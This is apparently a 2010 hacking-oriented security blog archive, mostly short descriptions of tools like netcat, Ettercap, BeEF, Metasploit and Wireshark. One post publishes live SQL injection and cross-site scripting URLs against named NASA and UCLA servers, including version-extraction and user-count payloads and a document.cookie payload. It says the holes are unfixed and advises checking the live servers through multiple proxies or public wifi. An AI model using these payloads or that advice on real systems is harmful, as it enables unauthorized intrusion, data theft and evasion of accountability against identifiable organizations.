The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. The tools included are used in all four steps of a web pen-test.
Starting with reconnaissance, tools such as the Fierce domain scanner and Maltego. For mapping, tools such as WebScarab and ratproxy. Tools for discovery include w3af and burp. For exploitation, the final stage, BeEF, AJAXShell and much more have also been included.

Creating a Win32 Reverse Connect Back Trojan using Netcat

2010-03-26T11:32:00.000+08:00

Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable “back-end” device that can be used candidly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.

In 2000 according to www.insecure.org Netcat was voted the second most functional network security tool. Also, in 2003 and 2006 it gained fourth place in the same category. Netcat is often referred to as a "Swiss-army knife for TCP/IP." Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.

According to http://nc110.sourceforge.net/, some of netcat's major features are:

* Outbound or inbound connections, TCP or UDP, to or from any ports
* Full DNS forward/reverse checking, with appropriate warnings
* Ability to use any local source port
* Ability to use any locally-configured network source address
* Built-in port-scanning capabilities, with randomization
* Built-in loose source-routing capability
* Can read command line arguments from standard input
* Slow-send mode, one line every N seconds
* Hex dump of transmitted and received data
* Optional ability to let another program service established connections
* Optional telnet-options responder
* Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel.

2010 Top Ten Hacks of the Year

2010-03-26T10:23:00.000+08:00

SSL Hacking and DNS Spoofing with Backtrack using Ettercap

2010-03-25T17:02:00.001+08:00

Ettercap is a Unix and Windows tool for computer network protocol analysis and security auditing. It is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols.
It is free open source software, licensed under the terms of the GNU General Public License.

Features

Ettercap supports active and passive dissection of many protocols (including ciphered ones) and provides many features for network and host analysis. Ettercap offers four modes of operation:

IP-based: packets are filtered based on IP source and destination.
MAC-based: packets are filtered based on MAC address, useful for sniffing connections through a gateway.
ARP-based: uses ARP poisoning to sniff on a switched LAN between two hosts (full-duplex).
PublicARP-based: uses ARP poisoning to sniff on a switched LAN from a victim host to all other hosts (half-duplex).

In addition, the software also offers the following features:

Character injection into an established connection: characters can be injected into a server (emulating commands) or to a client (emulating replies) while maintaining a live connection.

SSH1 support: the sniffing of a username and password, and even the data of an SSH1 connection. Ettercap is the first software capable of sniffing an SSH connection in full duplex.

HTTPS support: the sniffing of HTTP SSL secured data--even when the connection is made through a proxy.

Remote traffic through a GRE tunnel: the sniffing of remote traffic through a GRE tunnel from a remote Cisco router, and perform a man-in-the-middle attack on it.

Plug-in support: creation of custom plugins using Ettercap's API.

Password collectors for: TELNET, FTP, POP, IMAP, rlogin, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, Napster, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, Half-Life, Quake 3, MSN, YMSG

Packet filtering/dropping: setting up a filter that searches for a particular string (or hexadecimal sequence) in the TCP or UDP payload and replaces it with a custom string/sequence of choice, or drops the entire packet.

OS fingerprinting: determine the OS of the victim host and its network adapter.

Kill a connection: killing connections of choice from the connections-list.

Passive scanning of the LAN: retrieval of information about hosts on the LAN, their open ports, the version numbers of available services, the type of the host (gateway, router or simple PC) and estimated distances in number of hops.

Hijacking of DNS requests.

Ettercap also has the ability to actively or passively find other poisoners on the LAN.

Yahoo! Account Security Failure (POC)

2010-03-24T23:51:00.000+08:00

How Cross-Site Scripting (XSS) Works

2010-03-24T07:22:00.000+08:00

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007^. Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner.

How to Configure your Laptop to be an Access Point

2010-03-23T12:05:00.000+08:00

Steganography

2010-03-19T13:24:00.001+08:00

Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the existence of the message, a form of security through obscurity. The word steganography is of Greek origin and means "concealed writing" from the greek words steganos meaning covered or protected, and graphein (Γράφειν) meaning to write. The first recorded use of the term was in 1499 by Johannes Trithemius in his Steganographia, a treatise on cryptography and steganography disguised as a book on magic. Generally, messages will appear to be something else: images, articles, shopping lists, or some other covertext and, classically, the hidden message may be in invisible ink between the visible lines of a private letter.
The advantage of steganography, over cryptography alone, is that messages do not attract attention to themselves. Plainly visible encrypted messages—no matter how unbreakable—will arouse suspicion, and may in themselves be incriminating in countries where encryption is illegal. Therefore, whereas cryptography protects the contents of a message, steganography can be said to protect both messages and communicating parties.
Steganography includes the concealment of information within computer files. In digital steganography, electronic communications may include steganographic coding inside of a transport layer, such as a document file, image file, program or protocol. Media files are ideal for steganographic transmission because of their large size. As a simple example, a sender might start with an innocuous image file and adjust the color of every 100th pixel to correspond to a letter in the alphabet, a change so subtle that someone not specifically looking for it is unlikely to notice it.

Forensic Toolkit (FTK)

2010-03-17T21:08:00.001+08:00

Forensic Toolkit, or FTK, is a computer forensics software made by AccessData. It scans a hard drive looking for various information. It can for example locate deleted emails and scan a disk for text strings to use them as a password dictionary to crack encryption.

Honeyd

2010-03-16T15:30:00.000+08:00

Honeyd is an open source computer program that allows a user to set up and run multiple virtual hosts on a computer network. These virtual hosts can be configured to mimic several different types of servers, allowing the user to simulate an infinite number of computer network configurations. Honeyd is primarily used in the field of computer security by professionals and hobbyists alike, and is included as part of Knoppix Security Tools Distribution.

Applications

Distraction

Honeyd is used primarily for two purposes. Using the software's ability to mimic many different network hosts at once (up to 65536 hosts at once), Honeyd can act as a distraction to potential hackers. If a network only has 3 real servers, but one server is running Honeyd, the network will appear running hundreds of servers to a hacker. The hacker will then have to do more research (possibly through social engineering) in order to determine which servers are real, or the hacker may get caught in a honeypot. Either way, the hacker will be slowed down or possibly caught.

Honeypot

Honeyd gets its name for its ability to be used as a honeypot. On a network, all normal traffic should be to and from valid servers only. Thus, a network administrator running Honeyd can monitor his/her logs to see if there is any traffic going to the virtual hosts set up by Honeyd. Any traffic going to these virtual servers can be considered highly suspicious. The network administrator can then take preventative action, perhaps by blocking the suspicious IP address or by further monitoring the network for suspicious traffic.

Remote VNC Installation

2010-03-15T00:31:00.000+08:00

RealVNC is a server and client application for the Virtual Network Computing (VNC) protocol to control another computer's screen remotely. The company RealVNC Ltd. — founded by the same AT&T team which created the original VNC program — produces the RealVNC software. RealVNC runs on Windows, Mac OS X (Enterprise edition only), and many Unix-like operating systems (both free and enterprise-class). A RealVNC client also runs on the Java platform and on the iPhone. A Windows-only client is now available, designed to interface to the embedded server on Intel AMT chipsets found on Intel vPro motherboards.

Rainbow Cracking - MD2, MD4, MD5, SHA1,L1

2010-03-12T20:10:00.000+08:00

RainbowCrack is a computer program which generates rainbow tables to be used in password cracking. RainbowCrack differs from "conventional" brute force crackers in that it uses large pre-computed tables called rainbow tables to reduce the length of time needed to crack a password drastically. RainbowCrack was developed by Zhu Shuanglei, and implements an improved time-memory trade-off cryptanalysis attack which originated in Philippe Oechslin's Ophcrack.
As RainbowCrack's purpose is to generate rainbow tables and not to crack passwords per-se, some organizations have endeavored to make RainbowCrack's rainbow tables available free over the internet.

Bypassing Firewalls Using Reverse Telnet

2010-03-12T00:03:00.002+08:00

Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable “back-end” device that can be used candidly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.
In 2000 according to www.insecure.org Netcat was voted the second most functional network security tool. Also, in 2003 and 2006 it gained fourth place in the same category. Netcat is often referred to as a "Swiss-army knife for TCP/IP." Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.
According to http://nc110.sourceforge.net, some of netcat's major features are:

Outbound or inbound connections, TCP or UDP, to or from any ports
Full DNS forward/reverse checking, with appropriate warnings
Ability to use any local source port
Ability to use any locally-configured network source address
Built-in port-scanning capabilities, with randomization
Built-in loose source-routing capability
Can read command line arguments from standard input
Slow-send mode, one line every N seconds
Hex dump of transmitted and received data
Optional ability to let another program service established connections
Optional telnet-options responder
Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel.

Browser Exploitation

2010-03-08T12:47:00.006+08:00

BeEF is a web browser exploitation framework. This tool will demonstrate the collecting of zombie browsers and browser vulnerabilities in real-time. It provides a command and control interface which facilitates the targeting of individual or groups of zombie browsers.

Main Features :

BeEF provides an easily integratable framework that demonstrates the impact of browser and Cross-site Scripting issues in real-time. Development has focused on creating a modular framework. This has made module development a very quick and simple process.

Browser exploitation modules
Keystroke logging
Distributed Port Scanning
Integration with Metasploit via XML-RPC
Mozilla extension exploitation support
Tor detection
Browser functionality detection modules

How To Hide Files Inside Images

2010-03-04T21:59:00.001+08:00

Hiding files into another file is nothing new to the technically stealthy type however this trick will still prove useful in certain everyday situations. So with that I re-posted this classic video just to remind everyone the value of going back to one's roots. Enjoy :)

NASA Servers "0-day" Vulnerabilities

2010-02-25T22:43:00.005+08:00

After a series of SQL vulnerabilities last December 2009, the NASA website is on the security limelight again with another set of server vulnerabilities. I am aware that the agency itself has had budget issues lately and added the fact that they have a lot of servers to maintain on a daily basis, may have contributed to such negligence. However, all that should not be used as an excuse for the security oversight. After all, prevention such as input validation should not cost a single cent right?

Cross-Site Scripting / SQL :

http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=%27&node=0&instnname=0′AND+1/0;–&Submit=Search

Following error is giving some precious information (I mean many times it is returning different IP address in “Remote Address”. These IP addresses can be of other error generating remote clients, there might be some serious flaw:

http://www-pds.jpl.nasa.gov/tools/search.jsp?q=NOT
http://www-pds.jpl.nasa.gov/tools/text-search/results.jsp?query=%22
http://www-pds.jpl.nasa.gov/tools/data-search/search.jsp?q=OR
http://www-pds.jpl.nasa.gov/tools/data-search/search.jsp?q=”
etc.

Check these results of this Error based SQL injection:
http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=%27&node=1′%22;/*&instnname=-1;–&Submit=Search
http://www-pds.jpl.nasa.gov/tools/ddlookup/data_dictionary_lookup.cfm?type=element&q=NOT&genclasstype=0′&sysclassid=0

http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=&node=1&instnname=%27%29+OR+1=0+OR+57=rand%28convert%28%27NUMERIC,%27||%28select+@@version%29%29%252b900000000000000000000000%29–&Submit=Search
http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=&node=1&instnname=’)+OR+1=0+OR+57=rand(convert(‘NUMERIC,’||(select+@@version))%252b900000000000000000000000)–&Submit=Search
————————————————————————————————————————————————–
Error Executing Database Query.
Syntax error during explicit conversion of VARCHAR value ‘ Adaptive Server Enterprise/12.5.1/EBF 11429/P/Linux Intel/Enterprise Linux/ase1251/1823/32-bit/OPT/Tue Sep 16 23:43:54 2003′ to a NUMERIC field.

http://sbir.nasa.gov/sbirweb/abstracts/search_result.jsp?program=&phase=&progyr=99&st=&center=&firm=’select+@@version–’&sort=&sort2=&rec_per_page=1&cur_page=-2&start_page=-9999

http://sbir.nasa.gov/sbirweb/abstracts/search_result.jsp?program=SBIR&phase=&progyr=99st=center=firm=SBIR’or+1=utl_inaddr.get_host_address((select+concat(‘A’,count(username))+from+all_users))–’&sort=null&sort2=null&rec_per_page=100&cur_page=1&start_page=1

http://e4eil01u.ecs.nasa.gov:22000/WebAccess/drill?attrib=home%3Cscript%3Ealert(‘XSS–vinnu’)%3C/script%3E&next=group

http://www.igpp.ucla.edu/cgi-bin/ditdos?filter=GOPR_2001,HAL_,DS1_PEPE,DSPE&title=Comet

————————————————————————————————————————————————

http://directreadout.sci.gsfc.nasa.gov/index.cfm?section=home%22%3E%3Cscript%3Ealert(‘XSS–%5C%22vinnu%5C%22′)%3C/scrip

t%3E&page=news

http://ssd.jpl.nasa.gov/sbdb_help.cgi?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Safety Reminders :

1. The information above are for educational purposes only and should not be used for illegal purposes such as defacing, information theft, espionage, and the like.
2. Most of the vulnerabilities above are not yet fixed by NASA, so take extra precaution if you have to check the live servers yourself such as using multiple proxies or simply use public internet access such as a "wifi hotspot".
3. I have tried to notify the people in charge via email before posting these vulnerabilities but no reply from them until now for 2 weeks already.
4. Credits to Lox and Vinay.

Metasploit Meterpreter Reverse EXE

2010-02-22T20:14:00.001+08:00

The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.
The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework.
Metasploit was created in 2003 as a portable network game using the Perl scripting language. Later, the Metasploit Framework was then completely rewritten in the Ruby programming language. It is most notable for releasing some of the most technically sophisticated exploits to public security vulnerabilities. In addition, it is a powerful tool for third party security researchers to investigate potential vulnerabilities. On October 21, 2009 the Metasploit Project announcedthat it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.
Like comparable commercial products such as Immunity's CANVAS or Core Security Technologies' Core Impact, Metasploit can be used to test the vulnerability of computer systems in order to protect them, and it can be used to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities.
Metasploit's emerging position as the de facto vulnerability development framework has led in recent times to the release of software vulnerability advisories often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk, and remediation of that particular bug. Metasploit 3.0 (Ruby language) is also beginning to include fuzzing tools, to discover software vulnerabilities in the first instance, rather than merely writing exploits for currently public bugs. This new avenue has been seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November, 2006.

Bypassing Anti-Virus Using Metasploit

2010-02-19T13:52:00.000+08:00

This video shows how to bypass anti virus tools utilizing the new tricks in Metasploit 3.2

Fragroute

2010-02-15T12:26:00.006+08:00

One basic technique is to split the attack payload into multiple small packets, so that the IDS must reassemble the packet stream to detect the attack. A simple way of splitting packets is by fragmenting them, but an adversary can also simply craft packets with small payloads. The 'whisker' evasion tool calls crafting packets with small payloads 'session splicing'.
By itself, small packets will not evade any IDS that reassembles packet streams. However, small packets can be further modified in order to complicate reassembly and detection. One evasion technique is to pause between sending parts of the attack, hoping that the IDS will time out before the target computer does. A second evasion technique is to send the packets out of order, confusing simple packet re-assemblers but not the target computer.

Hping

2010-02-11T12:07:00.001+08:00

hping is a free packet generator and analyzer for the TCP/IP protocol distributed by Salvatore Sanfilippo (also known as Antirez). Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan scanning technique (also invented by the hping author), and now implemented in the Nmap Security Scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in very short time.

NSA.gov Hacked : Epic Fail

2010-02-09T00:02:00.004+08:00

I usually dislike and disagree to people who deface websites to state whatever point they want to prove but this one is really an exception. The defacement happened last October 2009 and was kept silent from the general public. This simply proves the poor state of IT security from supposedly one of the most security-knowledgeable agency in the entire planet. How does this happen you may ask? The security industry itself is filled with pretenders with fancy resumes and certifications who actually know almost next to none when it comes to real-world security threats. Otherwise, how do you explain being compromised with an 8-year old exploit which any newbie hacker can readily do?

How Password Crackers Work

2010-02-08T16:33:00.004+08:00

Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password. The purpose of password cracking might be to help a user recover a forgotten password (though installing an entirely new password is less of a security risk, but involves system administration privileges), to gain unauthorized access to a system, or as a preventive measure by system administrators to check for easily crackable passwords. On a file-by file basis, password cracking is utilized to gain access to digital evidence for which a judge has allowed access but the particular file's access is restricted.

Bypassing Firewalls Using SSH Tunneling

2010-02-07T13:02:00.002+08:00

An SSH tunnel consists of an encrypted tunnel created through an SSH protocol connection. Users may set up SSH tunnels to tunnel unencrypted traffic over a network through an encrypted channel. For example, Windows machines can share files using the SMB protocol, a non-encrypted protocol. If one were to mount a Microsoft Windows file-system remotely through the Internet, someone snooping on the connection could see transferred files. To mount the Windows file-system securely, one can establish an SSH tunnel that routes all SMB traffic to the remote fileserver through an encrypted channel. Even though the SMB protocol itself contains no encryption, the encrypted SSH channel through which it travels offers security.
To set up an SSH tunnel, one configures an SSH client to forward a specified local port to a port on the remote machine. Once the SSH tunnel has been established, the user can connect to the specified local port to access the network service. The local port need not have the same port number as the remote port.
SSH tunnels provide a means to bypass firewalls that prohibit certain Internet services — so long as a site allows outgoing connections. For example, an organization may prohibit a user from accessing Internet web pages (port 80) directly without passing through the organization's proxy filter (which provides the organization with a means of monitoring and controlling what the user sees through the web). But users may not wish to have their web traffic monitored or blocked by the organization's proxy filter. If users can connect to an external SSH server, they can create an SSH tunnel to forward a given port on their local machine to port 80 on a remote web server. To access the remote web server users would point their browser to http://localhost/.
Some SSH clients support dynamic port forwarding that allows the user to create a SOCKS 4/5 proxy. In this case users can configure their applications to use their local SOCKS proxy server. This gives more flexibility than creating an SSH tunnel to a single port as previously described. SOCKS can free the user from the limitations of connecting only to a predefined remote port and server.

Top Ten Web Hacking Techniques of 2008

2010-02-06T18:09:00.001+08:00

Top Ten Hacks of 2007

2010-02-06T18:07:00.002+08:00

Hacking Intranet Websites from the Outside

2010-02-06T17:52:00.003+08:00

Cybercrime in the Middle East on the rise

2010-02-06T11:44:00.000+08:00

Beirut (RPN) - Data protection and IT security is of increasing concern in the Middle East, where current research reveals an alarming upswing in cybercrime, with Saudi Arabia, the UAE, and Egypt topping the list as the most vulnerable to malicious internet attacks.

Internet security experts have classified the MENA region as one of the most vulnerable in the world to internet crime. As one of the world’s fastest growing economic hubs and a region where business activity is characterized by an explosion of corporate data, protecting sensitive information is becoming a vital concern from legal, financial, and economic perspectives.

Johnny Karam is the MENA region director for Symantec, an internet security firm. In an interview with RPN, he emphasized the growing threats presented by the increasingly sophisticated activity of cybercriminals.

"Cybercrime is certainly on the rise in the MENA region, and has spawned an underground economy, so to speak, where the goods traded include credit card information, active bank account details, and full-blown identities,” Karam said.

This is an organized environment, where specialists are recruited for their ability to hack or phish for information. Depending on its country of origin and other specifics, full credit card details – including acct number, full name, expiry date and security code, might sell for between 1 and ten dollars. Full active bank account information can be purchased for as little as ten dollars.

Symantec’s research for 2008 ranked Egypt the most vulnerable of 230 countries sampled in terms of vulnerability to malicious acts, including virus transmission, hacking, spamming, and phishing. Lebanon ranked 93.

But Karam warns against the assumption that malicious activity originates only from outside the business being targeted, emphasizing a link between tough economic conditions and the upswing in cybercrime:

"With the difficult economic climate, many businesses are looking at the need to downsize. They face the risk of information diversion as staff is downsized. Confidential data may be diverted, either intentionally, or unintentionally. The direct financial losses can be huge, as can the loss to a company’s brand name its customer list, or its advantage over competitors,” he explains.

Read more at : http://www.rpnnews.com/Story.aspx?StoryID=2046

Intrusion Detection Definitions

2010-02-06T10:13:00.001+08:00

Firewall and Perimeter Security

2010-02-06T10:09:00.000+08:00

US bill seeks cybersecurity scholarships : Send your kid to hacker school

2010-02-06T09:54:00.003+08:00

The US House of Representatives has overwhelmingly passed a bill that would direct almost $400m toward research designed to shore up the nation's cyber security defenses.
The Cybersecurity Enhancement Act would authorize $108.7m over five years to establish a cybersecurity scholarship program. In return, students would serve in federal government posts upon graduation.

Read More at http://www.theregister.co.uk/2010/02/04/house_cybersecurity_bill/

Data Mining Using Wireshark

2010-02-04T16:50:00.001+08:00

Data mining is the process of extracting patterns from data. Data mining is becoming an increasingly important tool to transform these data into information. It is commonly used in a wide range of profiling practices, such as marketing, surveillance, fraud detection and scientific discovery.
Data mining can be used to uncover patterns in data but is often carried out only on samples of data. The mining process will be ineffective if the samples are not a good representation of the larger body of data. Data mining cannot show up patterns that may be present in the larger body of data if those patterns are not present in the sample being "mined". Inability to find patterns may become a cause for some disputes between customers and service providers. Therefore data mining is not fool proof but may be useful if sufficiently representative data samples are collected. The discovery of a particular pattern in a particular set of data does not necessarily mean that a pattern is found elsewhere in the larger data from which that sample was drawn. An important part of the process is the verification and validation of patterns on other samples of data.
The term data mining has also been used to describe data dredging and data snooping. However, dredging and snooping can be (and sometimes are) used as exploratory tools when developing and clarifying hypotheses.

Cookies and Grabbing Passwords with Wireshark

2010-02-04T16:40:00.002+08:00

In this post, I will take you a little more deeper and introduce to the process of grabbing Cookies and Passwords using WireShark. As already known, WireShark is a Network Packet Analyzing tool which can be used to grab and analyze the various network packets passing through the Network Interface. This even includes Cookies and Passwords passing through the network interface card.In short, As HTTP is a stateless protocol, Cookies are one of the ways used to maintain browser state. Once a Cookie has been set on a domain and a specific path, it is echoed back in every subsequent request to the domain and path combination.
1.) Start WireShark and set a filter for HTTP results.
2.) In order to set a cookie, Navigate to http://httprecipes.com/1/2/cookies.php and click on the link “Set Cookie”. You will be asked to enter a value to the cookie. Enter “pinoysecurity” (without quotes) and press Set. This will set the cookie test-cookie with a value “pinoysecurity”.
3.) In WireShark, select the appropriate row with data to and from domain httprecipes.com. Lookout for Set-Cookie in HyperText Transmission Protocol.
4.) Passwords, passed as cleartext can also be grabbed easily using WireShark.

Introduction To Wireshark

2010-02-04T11:58:00.001+08:00

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.
Wireshark is cross-platform, using the GTK+ widget tool-kit to implement its user interface, and using pcap to capture packets; it runs on various Unix-like operating systems including Linux, Mac OS X, BSD, and Solaris, and on Microsoft Windows. Released under the terms of the GNU General Public License, Wireshark is free software.